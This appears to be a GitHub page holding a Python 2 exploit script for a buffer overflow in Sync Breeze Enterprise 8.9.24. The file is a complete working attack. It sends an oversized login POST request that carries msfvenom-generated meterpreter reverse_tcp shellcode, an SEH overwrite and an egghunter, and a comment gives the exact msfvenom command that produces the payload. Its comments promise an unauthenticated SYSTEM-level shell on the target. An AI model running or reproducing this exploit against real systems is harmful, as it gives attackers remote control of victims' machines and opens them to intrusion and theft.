-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathsyncbreeze894.py
More file actions
92 lines (75 loc) · 3.41 KB
/
syncbreeze894.py
File metadata and controls
92 lines (75 loc) · 3.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/python
print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.100',83))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xb8\xb5\x94\x3a\x99\xda\xc5\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x47\x83\xc3\x04\x31\x43\x11\x03\x43\x11\xe2"
buf += "\x40\x68\xd2\x1b\xaa\x91\x23\x7c\x23\x74\x12\xbc\x57"
buf += "\xfc\x05\x0c\x1c\x50\xaa\xe7\x70\x41\x39\x85\x5c\x66"
buf += "\x8a\x20\xba\x49\x0b\x18\xfe\xc8\x8f\x63\xd2\x2a\xb1"
buf += "\xab\x27\x2a\xf6\xd6\xc5\x7e\xaf\x9d\x7b\x6f\xc4\xe8"
buf += "\x47\x04\x96\xfd\xcf\xf9\x6f\xff\xfe\xaf\xe4\xa6\x20"
buf += "\x51\x28\xd3\x69\x49\x2d\xde\x20\xe2\x85\x94\xb3\x22"
buf += "\xd4\x55\x1f\x0b\xd8\xa7\x5e\x4b\xdf\x57\x15\xa5\x23"
buf += "\xe5\x2d\x72\x59\x31\xb8\x61\xf9\xb2\x1a\x4e\xfb\x17"
buf += "\xfc\x05\xf7\xdc\x8b\x42\x14\xe2\x58\xf9\x20\x6f\x5f"
buf += "\x2e\xa1\x2b\x7b\xea\xe9\xe8\xe2\xab\x57\x5e\x1b\xab"
buf += "\x37\x3f\xb9\xa7\xda\x54\xb0\xe5\xb2\x99\xf8\x15\x43"
buf += "\xb6\x8b\x66\x71\x19\x27\xe1\x39\xd2\xe1\xf6\x48\xf4"
buf += "\x12\x28\xf2\x95\xed\xc9\x03\xbf\x29\x9d\x53\xd7\x98"
buf += "\x9e\x3f\x27\x25\x4b\xd5\x2d\xb1\xb4\x82\x33\x83\x5d"
buf += "\xd1\x33\x12\xc2\x5c\xd5\x44\xaa\x0e\x4a\x24\x1a\xef"
buf += "\x3a\xcc\x70\xe0\x65\xec\x7a\x2a\x0e\x86\x94\x83\x66"
buf += "\x3e\x0c\x8e\xfd\xdf\xd1\x04\x78\xdf\x5a\xab\x7c\x91"
buf += "\xaa\xc6\x6e\x45\x5b\x9d\xcd\xc3\x64\x0b\x7b\xeb\xf0"
buf += "\xb0\x2a\xbc\x6c\xbb\x0b\x8a\x32\x44\x7e\x81\xfb\xd0"
buf += "\xc1\xfd\x03\x35\xc2\xfd\x55\x5f\xc2\x95\x01\x3b\x91"
buf += "\x80\x4d\x96\x85\x19\xd8\x19\xfc\xce\x4b\x72\x02\x29"
buf += "\xbb\xdd\xfd\x1c\x3d\x21\x28\x58\x4b\x4b\xe8"
#pop pop ret 10030991
nseh = "\x90\x90\xEB\x0B"
seh = "\x91\x09\x03\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12290 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()